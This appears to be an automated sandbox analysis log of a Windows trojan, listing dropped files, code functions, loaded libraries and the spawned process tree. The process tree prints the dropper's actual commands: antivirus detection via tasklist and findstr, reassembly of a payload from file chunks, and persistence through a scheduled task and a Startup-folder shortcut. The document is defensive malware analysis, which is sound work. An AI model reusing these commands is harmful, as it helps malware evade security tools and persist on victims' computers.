    Source: C:\Users\user\Desktop\nikDoCvpJa.exeFile created: C:\Windows\QuicklySelfJump to behavior
    Source: C:\Users\user\Desktop\nikDoCvpJa.exeFile created: C:\Windows\EvansCountriesJump to behavior
    Source: C:\Users\user\Desktop\nikDoCvpJa.exeFile created: C:\Windows\OurselvesClickJump to behavior
    Source: C:\Users\user\Desktop\nikDoCvpJa.exeCode function: 0_2_0040737E0_2_0040737E
    Source: C:\Users\user\Desktop\nikDoCvpJa.exeCode function: 0_2_00406EFE0_2_00406EFE
    Source: C:\Users\user\Desktop\nikDoCvpJa.exeCode function: 0_2_004079A20_2_004079A2
    Source: C:\Users\user\Desktop\nikDoCvpJa.exeCode function: 0_2_004049A80_2_004049A8
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comCode function: 19_2_001B801719_2_001B8017
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comCode function: 19_2_001AE14419_2_001AE144
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comCode function: 19_2_0019E1F019_2_0019E1F0
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comCode function: 19_2_001CA26E19_2_001CA26E
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comCode function: 19_2_001922AD19_2_001922AD
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comCode function: 19_2_001B22A219_2_001B22A2
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comCode function: 19_2_001AC62419_2_001AC624
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comCode function: 19_2_001CE87F19_2_001CE87F
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comCode function: 19_2_0021C8A419_2_0021C8A4
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comCode function: 19_2_00202A0519_2_00202A05
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comCode function: 19_2_001C6ADE19_2_001C6ADE
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comCode function: 19_2_001F8BFF19_2_001F8BFF
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comCode function: 19_2_001ACD7A19_2_001ACD7A
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comCode function: 19_2_001BCE1019_2_001BCE10
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comCode function: 19_2_001C715919_2_001C7159
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comCode function: 19_2_0019924019_2_00199240
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comCode function: 19_2_0022531119_2_00225311
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comCode function: 19_2_001996E019_2_001996E0
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comCode function: 19_2_001B170419_2_001B1704
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comCode function: 19_2_001B1A7619_2_001B1A76
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comCode function: 19_2_00199B6019_2_00199B60
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comCode function: 19_2_001B7B8B19_2_001B7B8B
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comCode function: 19_2_001B1D2019_2_001B1D20
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comCode function: 19_2_001B7DBA19_2_001B7DBA
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comCode function: 19_2_001B1FE719_2_001B1FE7
    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\638933\Beth.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comCode function: String function: 001B0DA0 appears 46 times
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comCode function: String function: 001AFD52 appears 40 times
    Source: C:\Users\user\Desktop\nikDoCvpJa.exeCode function: String function: 004062CF appears 57 times
    Source: nikDoCvpJa.exeStatic PE information: invalid certificate
    Source: nikDoCvpJa.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: nikDoCvpJa.exeStatic PE information: Section: .rsrc ZLIB complexity 0.994193565464666
    Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@36/29@3/2
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comCode function: 19_2_002041FA GetLastError,FormatMessageW,19_2_002041FA
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comCode function: 19_2_001F2010 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,19_2_001F2010
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comCode function: 19_2_001F1A0B AdjustTokenPrivileges,CloseHandle,19_2_001F1A0B
    Source: C:\Users\user\Desktop\nikDoCvpJa.exeCode function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044D1
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comCode function: 19_2_001FDD87 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,19_2_001FDD87
    Source: C:\Users\user\Desktop\nikDoCvpJa.exeCode function: 0_2_004024FB CoCreateInstance,0_2_004024FB
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comCode function: 19_2_00203A0E CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,19_2_00203A0E
    Source: C:\Users\user\AppData\Local\Temp\638933\Beth.comFile created: C:\Users\user\AppData\Local\SecureScope DynamicsJump to behavior
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6464:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5640:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5428:120:WilError_03
    Source: C:\Users\user\Desktop\nikDoCvpJa.exeFile created: C:\Users\user\AppData\Local\Temp\nsyBD3C.tmpJump to behavior
    Source: nikDoCvpJa.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
    Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
    Source: C:\Users\user\Desktop\nikDoCvpJa.exeFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Users\user\Desktop\nikDoCvpJa.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: nikDoCvpJa.exeReversingLabs: Detection: 26%
    Source: C:\Users\user\Desktop\nikDoCvpJa.exeFile read: C:\Users\user\Desktop\nikDoCvpJa.exeJump to behavior
    Source: unknownProcess created: C:\Users\user\Desktop\nikDoCvpJa.exe "C:\Users\user\Desktop\nikDoCvpJa.exe"
    Source: C:\Users\user\Desktop\nikDoCvpJa.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Cab Cab.cmd & Cab.cmd
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 638933
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Chosen" Bugs
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Wichita + ..\Sign + ..\Idol + ..\Lauren + ..\Rice + ..\Bold + ..\Loops + ..\Shore + ..\Marie g
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\638933\Beth.com Beth.com g
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
    Source: C:\Users\user\AppData\Local\Temp\638933\Beth.comProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Config" /tr "wscript //B 'C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.js'" /sc minute /mo 5 /F
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Config" /tr "wscript //B 'C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.js'" /sc minute /mo 5 /F
    Source: C:\Users\user\AppData\Local\Temp\638933\Beth.comProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CyberScope.url" & echo URL="C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CyberScope.url" & exit
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.js"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.com "C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.com" "C:\Users\user\AppData\Local\SecureScope Dynamics\r"
    Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.js"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.com "C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.com" "C:\Users\user\AppData\Local\SecureScope Dynamics\r"
    Source: C:\Users\user\Desktop\nikDoCvpJa.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Cab Cab.cmd & Cab.cmdJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 638933Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Chosen" Bugs Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Wichita + ..\Sign + ..\Idol + ..\Lauren + ..\Rice + ..\Bold + ..\Loops + ..\Shore + ..\Marie gJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\638933\Beth.com Beth.com gJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\638933\Beth.comProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Config" /tr "wscript //B 'C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.js'" /sc minute /mo 5 /FJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\638933\Beth.comProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CyberScope.url" & echo URL="C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CyberScope.url" & exitJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Config" /tr "wscript //B 'C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.js'" /sc minute /mo 5 /FJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.com "C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.com" "C:\Users\user\AppData\Local\SecureScope Dynamics\r"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.com "C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.com" "C:\Users\user\AppData\Local\SecureScope Dynamics\r"Jump to behavior
    Source: C:\Users\user\Desktop\nikDoCvpJa.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\nikDoCvpJa.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\Desktop\nikDoCvpJa.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\Desktop\nikDoCvpJa.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\Desktop\nikDoCvpJa.exeSection loaded: shfolder.dllJump to behavior
    Source: C:\Users\user\Desktop\nikDoCvpJa.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\Desktop\nikDoCvpJa.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\Desktop\nikDoCvpJa.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Users\user\Desktop\nikDoCvpJa.exeSection loaded: riched20.dllJump to behavior
    Source: C:\Users\user\Desktop\nikDoCvpJa.exeSection loaded: usp10.dllJump to behavior
    Source: C:\Users\user\Desktop\nikDoCvpJa.exeSection loaded: msls31.dllJump to behavior
    Source: C:\Users\user\Desktop\nikDoCvpJa.exeSection loaded: textinputframework.dllJump to behavior
    Source: C:\Users\user\Desktop\nikDoCvpJa.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Users\user\Desktop\nikDoCvpJa.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Users\user\Desktop\nikDoCvpJa.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Users\user\Desktop\nikDoCvpJa.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Users\user\Desktop\nikDoCvpJa.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\nikDoCvpJa.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\nikDoCvpJa.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\nikDoCvpJa.exeSection loaded: textshaping.dllJump to behavior
    Source: C:\Users\user\Desktop\nikDoCvpJa.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\Desktop\nikDoCvpJa.exeSection loaded: edputil.dllJump to behavior
    Source: C:\Users\user\Desktop\nikDoCvpJa.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Users\user\Desktop\nikDoCvpJa.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Users\user\Desktop\nikDoCvpJa.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Users\user\Desktop\nikDoCvpJa.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Users\user\Desktop\nikDoCvpJa.exeSection loaded: windows.staterepositoryps.dllJump to behavior
    Source: C:\Users\user\Desktop\nikDoCvpJa.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\Desktop\nikDoCvpJa.exeSection loaded: appresolver.dllJump to behavior
    Source: C:\Users\user\Desktop\nikDoCvpJa.exeSection loaded: bcp47langs.dllJump to behavior
    Source: C:\Users\user\Desktop\nikDoCvpJa.exeSection loaded: slc.dllJump to behavior
    Source: C:\Users\user\Desktop\nikDoCvpJa.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\Desktop\nikDoCvpJa.exeSection loaded: sppc.dllJump to behavior
    Source: C:\Users\user\Desktop\nikDoCvpJa.exeSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Users\user\Desktop\nikDoCvpJa.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\638933\Beth.comSection loaded: wsock32.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\638933\Beth.comSection loaded: version.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\638933\Beth.comSection loaded: winmm.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\638933\Beth.comSection loaded: mpr.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\638933\Beth.comSection loaded: wininet.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\638933\Beth.comSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\638933\Beth.comSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\638933\Beth.comSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\638933\Beth.comSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\638933\Beth.comSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\638933\Beth.comSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\638933\Beth.comSection loaded: ntmarta.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\638933\Beth.comSection loaded: napinsp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\638933\Beth.comSection loaded: pnrpnsp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\638933\Beth.comSection loaded: wshbth.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\638933\Beth.comSection loaded: nlaapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\638933\Beth.comSection loaded: mswsock.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\638933\Beth.comSection loaded: dnsapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\638933\Beth.comSection loaded: winrnr.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\638933\Beth.comSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\638933\Beth.comSection loaded: urlmon.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\638933\Beth.comSection loaded: iertutil.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\638933\Beth.comSection loaded: srvcli.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\638933\Beth.comSection loaded: netutils.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\638933\Beth.comSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\638933\Beth.comSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\638933\Beth.comSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\638933\Beth.comSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\638933\Beth.comSection loaded: winhttp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\638933\Beth.comSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comSection loaded: wsock32.dllJump to behavior
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comSection loaded: version.dllJump to behavior
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comSection loaded: winmm.dllJump to behavior
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comSection loaded: mpr.dllJump to behavior
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comSection loaded: wininet.dllJump to behavior
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comSection loaded: wsock32.dllJump to behavior
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comSection loaded: version.dllJump to behavior
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comSection loaded: winmm.dllJump to behavior
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comSection loaded: mpr.dllJump to behavior
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comSection loaded: wininet.dllJump to behavior
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comSection loaded: uxtheme.dllJump to behavior
